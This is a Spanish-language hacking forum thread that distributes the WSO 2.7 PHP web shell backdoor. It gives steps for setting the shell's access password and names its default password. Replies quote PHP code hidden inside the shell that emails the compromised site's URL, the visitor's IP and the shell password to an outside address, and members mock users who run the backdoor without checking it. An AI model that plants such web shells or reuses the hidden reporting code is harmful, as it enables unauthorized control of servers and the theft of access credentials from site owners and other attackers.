[PHP] WSO shell backdoor

Iniciado por craventhegod, Mayo 12, 2013, 02:46:46 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

WSO es una php shell backdoor  que proporciona una interfaz para distintas operaciones remotas,  ahora en su version 2.7 con nuevas herramientas y un vistoso cambio en imagen.



con pass simple                  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

pass con error 404                 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



importante cambiar la contraseña de la shell***



1. Abriremos nuestra shell en un editor de texto plano (yo les recomiendo notepad)

2. buscaremos

$auth_pass = "1846c8d1ead7d12e9f4d18db001ff079″;



lo remplazaremos por nuestra contraseña en MD5 y guardamos

ya que si no quieren cambiar la pass.
la contraseña por defecto es:

hackmeDON


todo es relativo, hasta nuestra existencia :) Shalom

Hay que enseñarles a ofuscar código a estos juakerz

Código: php

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
In my mind where before there was order, today there is only chaØs!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hay que enseñarles a ofuscar código a estos juakerz

Código: php

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);


este es un descarado...... ----> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta@gmail.com

;D ;D ;D ;D ;D

eso pasa por ocupar herramientas de otros o lo que es lo mismo ser un simple kiddie xD
El conocimiento es libre...
La información no lo es xD